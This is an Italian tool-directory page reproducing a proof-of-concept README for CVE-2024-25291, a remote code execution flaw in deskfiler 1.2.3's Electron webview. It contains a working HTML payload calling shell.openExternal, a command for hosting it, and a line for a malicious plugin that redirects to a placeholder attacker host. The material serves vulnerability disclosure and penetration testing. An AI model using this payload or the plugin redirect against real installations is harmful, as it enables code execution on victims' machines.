Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-25291 — deskfiler 1.2.3 exploit Open Redirect | Kitploit
Strumenti/GitHubGitHub/eqstlab/cve-2024-25291
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubeqstlab/cve-2024-25291

CVE-2024-25291

deskfiler 1.2.3 exploit Open Redirect

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

DeskFiler RCE

Una prova di concetto per la vulnerabilità CVE-2024-25291.

deskfiler - 1.2.3 consente la webview Electron nell'applicazione, con conseguente codice remoto In questo repository è presente un'applicazione vulnerabile di esempio e il relativo exploit proof-of-concept (POC).

Come PoC è presente un file Python che automatizza il processo.

1.Panoramica della vulnerabilità:

  • Oggetto della vulnerabilità: Open Redirect via RCE
  • Versione vulnerabile: deskfiler-1.2.3
  • Manifestazione del problema: Electron Webview
  • Tipo di attacco: Esecuzione di codice remoto (Remote Code Execution)
  • Vettori di attacco: Per sfruttare la vulnerabilità, qualcuno deve aprire il plug-in.
  • Numero CVE riservato: CVE-2024-25291

2. Causa della vulnerabilità:

  • Spiegazione dell'exploit
    • In una sezione specifica dell'applicazione, è stata confermata una sezione che accede a un link esterno tramite una Webview attraverso un electron. Pertanto, tramite questa, è possibile ottenere una RCE connettendosi al server dell'attaccante

Prova di concetto (POC)

  • Passo 1) Preparare il server dell'attaccante e creare un plug-in malintenzionato.
root@kitploit:~
<html>
 <head>
 <title>jruru</title>
 </head>
 <body>
 <script>
 const { shell } = require('electron');
 shell.openExternal('file:C:/Windows/System32/calc.exe');
 </script>
 </body>
 </html>

※ Se vuoi testarlo rapidamente, crea un server sul PC dell'attaccante con il seguente codice.

root@kitploit:~
$ python -m http.server 80

Nota: ※ In questo momento, si presume che il plug-in sia un plug-in generato dall'attaccante e sia solo un plug-in normale con un codice aggiunto per consentire l'accesso al server dell'attaccante. BareBone è stato selezionato per un test semplice deskfiler1

Successivamente, aggiungi il seguente codice al file index.js nel percorso della cartella BareBone.

root@kitploit:~
window.location='http://[attacker_ip]/hack.html'
  • Passo 2) Sul server della vittima, esegui Deskfiler e installa il plug-in BareBone tramite "Add new plugin". deskfiler2

deskfiler3


3. Informazioni aggiuntive

In questo PoC abbiamo utilizzato un plug-in; tuttavia, riteniamo che con vettori di attacco alternativi sia possibile ottenere Remote Code Execution (RCE) in modo indipendente. Inoltre, se esistono vulnerabilità lato server come Stored XSS, Reflected XSS, la RCE è considerata fattibile.

Scarica lo strumento